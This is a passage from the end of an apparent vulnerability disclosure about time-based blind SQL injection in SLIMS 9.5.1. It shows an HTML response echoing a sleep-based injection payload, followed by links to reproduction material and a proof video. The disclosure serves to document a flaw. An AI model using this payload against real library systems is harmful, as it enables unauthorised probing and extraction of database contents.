td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div><div class="loader"></div><script type="text/javascript">    // if we are inside iframe    jQuery(document).ready(function () {          });</script></body></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)## Proof and Exploit:[href](https://streamable.com/gthu91)## Time spent`04:00:00`

Tag

#sql